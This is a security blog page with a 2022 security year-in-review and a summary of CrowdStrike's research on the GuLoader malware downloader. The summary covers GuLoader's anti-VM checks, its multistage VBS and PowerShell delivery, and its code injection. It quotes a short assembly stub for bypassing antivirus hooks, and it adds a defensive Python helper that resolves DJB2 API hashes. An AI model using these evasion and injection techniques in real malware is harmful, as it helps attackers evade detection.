So, yeah, things got harder for security professionals in 2022. But it wasn’t all bad. Security analytics continued to advance, improving detection. Organizations started making progress on deploying zero-trust architectures for both their perimeters and identity environments. Security budgets weren’t impacted until late in the year, as security tends to be one of the last expenditures to be impacted in a slowdown. Ultimately, a couple of realities set in this year, and for 2023 to improve we’re going to have to address them.

  1. No juice: I was involved in a number of cloud and container security projects with enterprises this year. In each one, the security team had difficulty getting the dev teams and business influencers to care. To be clear, they said they cared, but their actions spoke louder. They don’t care about security until something bad happens. Then, they are happy to throw security under the bus. The mandate for change will need to come from the executive suite. That’s the only way to align the incentives toward protecting data.
  2. Identities run amok: As workloads and data move to the cloud, implementing an effective, enterprise-wide identity and access management (IAM) strategy is the critical arbiter of success. It’s also hard to retrofit an effective tenancy and IAM structure once workloads are deployed, so there isn’t a lot of time to waste to get your arms around IAM.
  3. AppSec still lags: As exciting as it is to think about having developers build secure code, they are neither trained nor incentivized to do so. Thus, they don’t. Yes, you can (and must) build security tests into the pipelines. You should push (hard!) to break builds that have critical security errors. But developers have pushed back (and will continue to push back) on being responsible for application security, so we’ll need to find a middle ground.
  4. Skills upgrade: Sadly, with many companies reducing headcount, thousands of qualified security folks are looking for work. Yes, many of them get snapped up quickly, but not all. Now would be a great time to invest in your security skills, but too many organizations responded to the slowdown by freezing hiring and don’t use downturns as an opportunity to upgrade their personnel. The savviest managers buy when everyone else is selling; many organizations were selling in 2022 (and will continue to do so in 2023). If you can, add hard-to-find skills (like cloud security and AppSec) now.
  5. Regulatory uncertainty: Between the ongoing privacy litigation in Europe and the new software bill of materials (SBOM) mandate in the U.S., it remains hard to know what “compliance” really means and what it will take to pass assessments. Of course, an effective security program should address most compliance requirements, but there will continue to be uncertainty, so expect some unplanned work as we get clarity on the expectations.

I could go on, but that’s a pretty good overview. I alluded a bit to what’s coming in 2023, but we’ll dig into that in greater depth during our Predict 2023 virtual conference on January 12, 2023. You can register here. Have a happy and safe holiday season, and we’ll see you at Predict in a few weeks.

Cybersecurity Labor Shortage Grows Worse in U.S. And Worldwide: Report

Global Cyber Security Labor Shortage and International Business Risk



Tags: cyber security shortage


Dec 26 2022

GuLoader implements new evasion techniques

Category: Cyber Threats,Security vulnerabilitiesDISC @ 1:08 pm

Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader.

CrowdStrike researchers detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka CloudEyE).

GuLoader uses a polymorphic shellcode loader to evade traditional security solutions; the experts mapped all of the embedded DJB2 hash values to the API names used by the malicious code.

The malware uses an anti-analysis technique to avoid execution in virtualized environments.

“In dissecting GuLoader’s shellcode, CrowdStrike revealed a new anti-analysis technique meant to detect if the malware is running in a hostile environment by scanning the entire process memory for any Virtual Machine (VM)-related strings.” reads the analysis published by CrowdStrike.

“New redundant code injection mechanism means to ensure code execution by using inline assembly to bypass user mode hooks from security solutions.”

GuLoader first appeared on the threat landscape in 2019; it was used by threat actors to download multiple remote access trojans (RATs) such as AgentTesla, FormBook, Nanocore, NETWIRE and the Parallax RAT.

Early versions of GuLoader were distributed via spam messages using attachments containing the malicious executable. Recent variants were delivered via a Visual Basic Script (VBS) file.

“GuLoader also started employing advanced anti-analysis techniques to evade detection, such as anti-debug, anti-sandbox, anti-VM and anti-detection to make analysis difficult.” reads the analysis.

A recent GuLoader variant analyzed by the experts exhibits a multistage deployment:

  • The first stage uses a VBS dropper file to drop a second-stage packed payload into a registry key. It then uses a PowerShell script to execute and unpack the second stage payload from the registry key within memory. 
  • The second stage payload performs all anti-analysis routines (described below), creates a Windows process (e.g., an ieinstal.exe) and injects the same shellcode into the new process.
  • The third stage reimplements all the anti-analysis techniques, downloads the final payload from a remote server and executes it on the victim’s machine.

The malware implements anti-debugging and anti-disassembling checks to detect the presence of breakpoints used for the analysis of code.

The researchers also noticed the use of a redundant code injection mechanism to avoid NTDLL.dll hooks used by antivirus and EDR solutions to detect malicious activities.

“It then maps that section via NtMapViewofSection on the suspended process.” continues the analysis. “If this injection technique fails, it uses the following redundancy method:

a. NtAllocateVirtualMemory by invoking the inline assembly instructions (without calling ntdll.dll, to bypass AV/EDR User Mode hooks) of that function, using the following assembly stub:

  mov eax,18
  mov edx,ntdll.77178850
  call edx
  ret 18

It uses NtWriteProcessMemory to copy the same shellcode onto that virtually allocated address.”

Experts pointed out that GuLoader remains a dangerous threat that constantly evolves; they also shared Indicators of Compromise for the latest variant of the downloader.
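An analyst-side illustration of the DJB2 hash mapping CrowdStrike describes above, added here and not taken from CrowdStrike’s or the post’s code: it computes classic DJB2 over a constructed list of candidate API names, builds the hash-to-name table analysts use to read a loader that stores hashes instead of import names, and scans a constructed byte blob for embedded hashes. Real samples may use a different seed or add a per-sample constant, which is why the seed is a parameter.

```python
# Added example (not CrowdStrike's or the post's code): rebuild the hash -> API-name
# table an analyst needs when a loader stores DJB2 hashes instead of import names.
# The candidate export list and the "embedded" blob below are constructed for the demo.
import struct

def djb2(data, seed=5381, bits=32):
    """Classic DJB2 (h = h*33 + c), truncated to `bits`. Samples often tweak the
    seed or add a per-sample constant, so `seed` is a parameter you can adapt."""
    if isinstance(data, str):
        data = data.encode("ascii")
    mask = (1 << bits) - 1
    h = seed
    for b in data:
        h = ((h << 5) + h + b) & mask
    return h

def build_table(api_names, **hash_kw):
    """hash -> name for every candidate export; a collision would make resolution ambiguous."""
    table = {}
    for name in api_names:
        h = djb2(name, **hash_kw)
        if table.get(h, name) != name:
            raise ValueError("DJB2 collision: %s vs %s" % (table[h], name))
        table[h] = name
    return table

def resolve(hashes, table):
    """Translate embedded hash values; unknown ones are kept as hex for follow-up."""
    return [table.get(h, "unknown_0x%08x" % h) for h in hashes]

def scan_blob(blob, table):
    """Find every 4-byte little-endian value in `blob` that matches a table entry."""
    hits = []
    for off in range(len(blob) - 3):
        (v,) = struct.unpack_from("<I", blob, off)
        if v in table:
            hits.append((off, table[v]))
    return hits

# Constructed candidate list: the NT calls named in the write-up (NtWriteVirtualMemory is
# the actual ntdll export behind the quoted NtWriteProcessMemory) plus common neighbours.
CANDIDATES = ["NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtMapViewOfSection",
              "NtCreateSection", "NtProtectVirtualMemory", "NtCreateThreadEx",
              "VirtualAlloc", "WriteProcessMemory", "LoadLibraryA", "GetProcAddress"]
TABLE = build_table(CANDIDATES)

# Constructed stand-in for a shellcode fragment: filler bytes around two embedded hashes.
DEMO_BLOB = (b"\x90" * 3 + struct.pack("<I", djb2("NtAllocateVirtualMemory"))
             + b"\xcc" + struct.pack("<I", djb2("LoadLibraryA")))
```

In practice you feed build_table() the full export list of ntdll.dll and kernel32.dll and run scan_blob() over the decoded shellcode; a run of resolved names such as NtAllocateVirtualMemory followed by NtWriteVirtualMemory is the injection sequence the write-up describes.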

Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

Metasploit Penetration Testing Cookbook – Third Edition: Evade antiviruses, bypass firewalls, and exploit complex environments with the most widely used penetration testing framework

Tags: Antivirus Bypass, evasion techniques, Metasploit

